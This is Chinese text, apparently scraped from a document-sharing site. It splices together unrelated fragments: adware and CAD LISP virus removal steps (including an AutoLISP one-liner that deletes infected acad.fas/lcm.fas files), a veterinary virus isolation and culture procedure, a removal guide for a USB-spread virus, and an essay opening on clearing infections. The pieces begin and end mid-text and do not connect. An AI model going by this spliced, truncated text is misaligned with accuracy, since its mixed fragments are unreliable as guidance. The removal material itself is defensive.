0.80 - 1.24的壳,脱掉用16位进制软件打开发现这个垃圾插件利用HOOK技术插入到explorer和iexplore中,开机就在后台自动运行。 安全模式下,右键点击我的电脑-管理-服务-禁用jmediaservice服务,删除C:\windows\system32下的Albus.DAT,删除C:\WINDOWS\SYSTEM32\DRIVERS下的Albus.SYS,删除彩信通的安装文件夹,开始-运行-regedit-查找所有MMSAssist并删除,如果怕注册表还有彩信通的垃圾存在,下载个超级兔子扫描下注册表再一一删除,你也可以试试超级兔子的超级卸载功能。 要阻止它再次安装,也很简单。彻底删除它之后,你在它原来的位置新建一个与它同名的文件夹,
常见CAD病毒处理
cad使用不正常,CAD病毒清除方法 打开CAD后出现一信息分析: 这是一个专门针对CAD的病毒程序,不是传统意义上的病毒,因此,用诺顿、金山毒霸等是不能杀除的。 它的作用机制是这样的:某台机器上没有这个病毒程序,在通过网上邻居拷贝别人的图纸时,大家经常会把整个目录拷贝过来,如果拷贝的这个目录中包含有acad.lsp和acadapp.lsp,你的机器就有了这个病毒,但是还没有起作用。当你用CAD打开这个文件时,CAD会自动加载该目录下的acad.lsp,这个LSP程序会检测你的CAD支持support目录下是否有这两个文件,如果没有,它会自动在那里创建他们的副本。 以后,在你打开别的图纸时,它会在判断你要打开的图纸目录下有没有这两个文件,如果没有,它又在该目录下创建这两个文件的副本。就这样,你的机器上的dwg文件目录中逐步都有了这个程序。随着别人按照目录拷贝你的dwg文件,他们也感染上了。 因此,如果你的机器上没有CAD病毒程序,只要你从别处拷贝图纸时,只拷贝dwg文件就不会感染CAD病毒了. LSP 文件 (.lsp) - 一种包含 AutoLISP 程序代码的 ASCII 文本文件。 FAS 文件 (.fas) - 一个 LSP 程序文件的二进制编译版本。 删除: 进入CAD文件夹,分别查到acad.fas,acad.lsp和 acadapp.lsp,acad.mnl,acad.chw,lcm.fas后删除到C:\Documents and Settings\(你的用户名)\Application Data\Autodesk\AutoCAD 2004\R16.0\chs\Support\下(AutoCAD的版本不同2004和16有可能不同)搜索acad.fas,acad.lsp和acadapp.lsp,acad.mnl,acad.chw,lcm.fas后删除. 全盘搜索acad.fas,acad.lsp后删除. 常见问题是C:\Program Files\autocad***目录(子目录)下的 acad.fas与lcm.fas是在全部查找时找不到的,请手动进入目录再行查找删除! 不想进去目录查找也可以输入下面的字符到CAD命令行: (while (or (setq a (findfile "acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-delete a)) 注意:上面红字一个字都不能少!这样就行了! 如果有文字编缉时出现记事本的现象请将下面一行红字输入到命令行: (setvar "mtexted" ".") 二。由于CAD病毒有别于传统病毒,致使目前很多杀毒软件对其无能为力,此工具可以帮您将CAD恢复到正常状态! CAD中毒迹象:
病毒的分离培养标准操作规程
病毒的分离培养标准操作规程 1.目的:规范病毒分离及鉴定培养操作流程,保证试验结果的重复性和稳定性。 2.术语:EID50/0.1ml,ELD50/0.1ml,TCID50/0.1ml,CPE 3.操作程序与方法: 3.1 采样:对于病死或剖杀动物,采集病毒主要聚集组织部位,一般为淋巴结、脾脏、肺脏、血液等;对于活体动物,可用无菌棉拭子采集含病毒量最多部位(口腔、鼻腔、生殖道、肛门等)的分泌液。采集样品如不能立即处理,应冻存与-20℃备用。长 途运输应用冰盒或4℃低温保存。 3.2 样品处理:组织块可用剪刀剪碎并研磨,加入10倍体积含300-500UI/ml青、 链霉素的生理盐水(PBS),反复冻融2-3次。棉拭子可直接混于3-5倍体积含300-500UI/ml 青、链霉素的生理盐水(PBS),反复冻融2-3次。8000rpm离心15min,取上清液用0.22μm滤膜过滤,透过液即为病毒原液,收集保存,短期保存4℃,长期保存用液氮。 3.3接种培养:将病毒原液接种与特定细胞单层中,连续盲传4-6代,观察细胞是 否产生特异性CPE,并计算及TCID50/0.1ml。禽源类病毒可接适当日龄鸡胚或鸡胚成纤维细胞进行扩增和鉴定,并计算及EID50/0.1ml和ELD50/0.1ml。 3.4 病毒纯化:采用“有限梯度稀释法”结合“噬斑纯化法”对病毒进行纯化; 3.5 动物回归实验:分离培养并纯化好的病毒回归接种动物,观察动物病变是否为该病毒引起及病变特征是否典型。 3.6分子生物学鉴定:基因组提取并设计特异性引物,对分离病毒保守区基因片段 进行特异性扩增,并测序,从分子水平对其进行鉴定。 3.7血清学鉴定:用标准阳性血清与分离病毒作用一段时间后再次接种特异性细胞 或鸡胚验证病毒特异性。或者用荧光标记抗体与病毒作用后荧光显微镜下观察其特异性。 4.注意事项 4.1采样过程应做好自身防护,烈性病不得随意分离。 4.2 实验动物应及时焚烧或深埋等处理,避免病毒扩散到环境中。 4.3 纯化好毒种应及时做好扩毒并建立毒种库。 1
手工清除ms-dos。com病毒的方法
手工清除https://www.wendangku.net/doc/502750612.html,病毒的方法 中毒现象:每隔30秒飞出一个飘动的图片,写着“your computer is being attacked”(您的计算机受到攻击),还不停地发出噔噔的声音。有时开机有一个进程借“regedit.exe"(注册表编辑器)发作,跳出一个象枫叶样的窗口在屏幕上晃来晃去。不能切换中英文输入,输入法失效和优盘文件夹丢失。查看各盘符根目录下有https://www.wendangku.net/doc/502750612.html, 文件;查看进程有:Global.exe、keyboard、fonts.exe等进程,即可确定电脑已被此病毒感染。由于其他盘上还有病毒(如优盘上的220K病毒文件),即使格式化C盘,重装系统,稍不留意仍然会死灰复燃,前功尽弃。我单位最近因为此病毒大面积泛滥造成人人自危,由于没有专杀软件,防毒、杀毒苦不堪言,严重影响正常工作。 杀毒需要的文件: 一共有四个文件:sreng-2,冰刃IceSword122cn ,yereg-rd.bat ,yereg-rd.bat。 第一步运行“冰刃IceSword122cn”,中止该死的进程。 第二步运行“yereg-rd.bat”,删除所有病毒文件,建立免疫文件夹。
第三步运行“sreng-2”,修复注册表编辑器的关联。打开sreng-2(可能有已经过期的提示,不要紧,把系统日期修改成2007年照样可用),别的都不用做,只把“系统修复--文件关联”做一下就可以了。重复点几下,当发现 .reg 的关联变成“regedit.exe”就正常了(如果第一步没有中止进程,这里也不可能恢复)。 第四步运行“killms.reg”,导入注册表,清除注册表启动项和清除映像劫持项以及清除一些病毒残留。 总结一下几个关键点:必须先中止进程,否则根本没办法继续往下做第二步;然后是修复regedit注册表编辑器的关联,这是为做第四步创造前提条件。环环相扣,不能省略也不能提前做。 具体的杀毒方法和原理分析 关键字:global.exe、fonts.exe、keyboard.exe、https://www.wendangku.net/doc/502750612.html,、tskmgr.exe、remoteabc.exe、autorun.inf、输入法丢失、找回输入法、220K文件夹、映像劫持、regedit 关联、病毒防御、病毒免疫。
清理病毒的终极方法
清理病毒的终极方法 【摘要】计算机病毒的泛滥与层出不穷,往往使普通用户深受其害,有时候更是束手无策,也使学生如临深渊,教材中也缺少系统的解决方案。寻找反击病毒的通用方法,尽最大可能恢复系统的正常,使普通用户也能在危机的时候凭最基本的操作能自己处理此类问题,为病毒防杀软件提供纯净平台。 【关键词】病毒可疑进程 DOS 运行权 PE系统釜底抽薪备份忠告 你已经明显的感觉到你的系统出现了问题,比如打开程序缓慢,移动鼠标困难,浏览网页不顺畅,莫明其妙的跳出些窗口,正常的程序不能运行,硬盘上出现了一些你不清楚的文件与目录,但是你却束手无策,因为你的杀毒软件已经不能正常运行,你的各种流氓软件清理工具也已经失灵,甚至你想登录到一些病毒防杀治理的网站都不可能。这个时候的病毒已经一手遮天,对它产生“危害”的程序及操作它都要想方设法阻止,它在大模大样的狞笑,怎么办?去找“高人”吗,好象也可以,但恰巧“高人”有事去了,你却心急如焚;去重装系统吗,好像绝大部分人不想这么做,恐怕你也不想这么做。怎么办?自己办! 一点预备知识。病毒本质上也是一个计算机程序,它再厉害还不能达到你对它不能进行任何操作的程度,脱离了系统环境,它的一切功能就将消失,随你来“修理”它。得不到系统的支持它没有任何威胁,只要我们不让它运行,就为我们来清理它创造了有利的条件。 病毒要挟持系统,无外乎是在杀毒软件及流氓软件清理工具掌管系统之前优先占领系统,在系统的制高点上来狙击对它自身产生“危害”的程序及操作,从而获得系统至高无上的权利,使自己随时处于保护与传播及破坏的状态。要想抢先运行,无外乎依赖系统提供的方式,都要在系统启动的时候加载自己,尽可能的利用系统存在的漏洞,既要保证系统工作又要使自己隐身其中,都要在内存及系统的关键位置留下蛛丝马迹,这就为我们消灭它提供了线索。摧毁其“政权”,支解它的体系,反其道而行之就是我们来发现它、战胜它的途径。下面我们就来见招拆招,练就清理病毒的终极方法。